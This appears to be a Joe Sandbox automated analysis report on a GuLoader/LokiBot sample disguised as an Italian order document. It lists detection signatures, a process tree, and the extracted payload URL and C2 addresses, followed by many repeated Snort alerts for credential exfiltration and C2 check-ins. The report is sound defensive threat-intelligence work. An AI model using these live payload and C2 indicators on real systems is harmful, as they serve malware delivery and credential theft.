Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report ORDINE + DDT A.M.F SpA.exe

Overview

General Information

Sample Name:ORDINE + DDT A.M.F SpA.exe
Analysis ID:528460
MD5:f5423b7a89876044078cbb68db883af8
SHA1:24c550c47d26090f298fea030d7fb890c94737a5
SHA256:68a315123349444d30fed12643a7be20eb003531a4b95d0db800fb765449037d
Infos:

Most interesting Screenshot:

Detection

GuLoader Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected Lokibot
Antivirus detection for URL or domain
GuLoader behavior detected
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Hides threads from debuggers
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Enables debug privileges
Sample file is different than original file name gathered from version info
PE file contains strange resources
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
PE / OLE file has an invalid certificate
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64native
  • ORDINE + DDT A.M.F SpA.exe (PID: 4632 cmdline: "C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe" MD5: F5423B7A89876044078CBB68DB883AF8)
    • ORDINE + DDT A.M.F SpA.exe (PID: 8108 cmdline: "C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe" MD5: F5423B7A89876044078CBB68DB883AF8)
      • lsass.exe (PID: 120 cmdline: C:\Windows\system32\lsass.exe MD5: 15A556DEF233F112D127025AB51AC2D3)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://fabricraft.co.za/Farmant_hhVNwJna195.bin"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000008.00000000.238036448865.0000000000560000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      Process Memory Space: ORDINE + DDT A.M.F SpA.exe PID: 8108JoeSecurity_Lokibot_1Yara detected LokibotJoe Security

        Sigma Overview

        System Summary:

        barindex
        Sigma detected: Windows Processes Suspicious Parent DirectoryShow sources
        Source: Process startedAuthor: vburov: Data: Command: C:\Windows\system32\lsass.exe, CommandLine: C:\Windows\system32\lsass.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\lsass.exe, NewProcessName: C:\Windows\System32\lsass.exe, OriginalFileName: C:\Windows\System32\lsass.exe, ParentCommandLine: "C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe" , ParentImage: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe, ParentProcessId: 8108, ProcessCommandLine: C:\Windows\system32\lsass.exe, ProcessId: 120

        Jbx Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Found malware configurationShow sources
        Source: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://fabricraft.co.za/Farmant_hhVNwJna195.bin"}
        Multi AV Scanner detection for submitted fileShow sources
        Source: ORDINE + DDT A.M.F SpA.exeVirustotal: Detection: 21%Perma Link
        Antivirus detection for URL or domainShow sources
        Source: https://farmanat.ro/arman30/five/fre.phpAvira URL Cloud: Label: malware
        Source: http://farmanat.ro/arman30/five/fre.phpAvira URL Cloud: Label: malware
        Multi AV Scanner detection for domain / URLShow sources
        Source: farmanat.roVirustotal: Detection: 10%Perma Link
        Source: https://farmanat.ro/arman30/five/fre.phpVirustotal: Detection: 11%Perma Link
        Source: http://farmanat.ro/arman30/five/fre.phpVirustotal: Detection: 10%Perma Link
        Source: ORDINE + DDT A.M.F SpA.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
        Source: unknownHTTPS traffic detected: 197.242.150.64:443 -> 192.168.11.20:49816 version: TLS 1.2

        Networking:

        barindex
        Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
        Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.11.20:49817 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49817 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49817 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.11.20:49817 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49821 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49821 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49822 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49822 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49822 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49822 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49823 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49823 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49823 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49823 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49824 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49824 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49824 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49824 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49825 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49825 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49825 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49825 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49826 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49826 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49826 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49826 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49828 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49828 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49828 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49828 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49844 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49844 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49844 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49844 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49845 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49845 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49845 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49845 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49846 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49846 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49846 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49846 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49847 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49847 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49847 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49847 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49848 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49848 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49848 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49848 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49849 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49849 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49849 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49849 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49850 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49850 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49850 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49850 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49851 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49851 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49851 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49851 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49852 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49852 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49852 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49852 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49853 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49853 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49853 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49853 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49854 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49854 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49854 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49854 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49855 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49855 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49855 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49855 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49856 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49856 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49856 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49856 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49857 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49857 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49857 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49857 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49858 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49858 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49858 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49858 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49859 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49859 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49859 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49859 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49860 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49860 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49860 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49860 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49861 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49861 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49861 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49861 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49862 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49862 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49862 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49862 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49863 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49863 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49863 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49863 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49864 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49864 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49864 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49864 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49865 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49865 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49865 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49865 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49866 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49866 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49866 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49866 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49867 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49867 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49867 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49867 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49869 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49869 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49869 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49869 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49870 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49870 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49870 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49870 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49871 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49871 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49871 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49871 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49872 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49872 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49872 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49872 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49873 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49873 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49873 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49873 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49874 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49874 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49874 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49874 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49875 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49875 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49875 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49875 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49876 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49876 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49876 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49876 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49877 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49877 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49877 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49877 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49878 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49878 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49878 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49878 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49879 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49879 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49879 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49879 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49880 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49880 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49880 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49880 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49881 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49881 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49881 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49881 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49882 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49882 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49882 -> 176.223.209.128:80
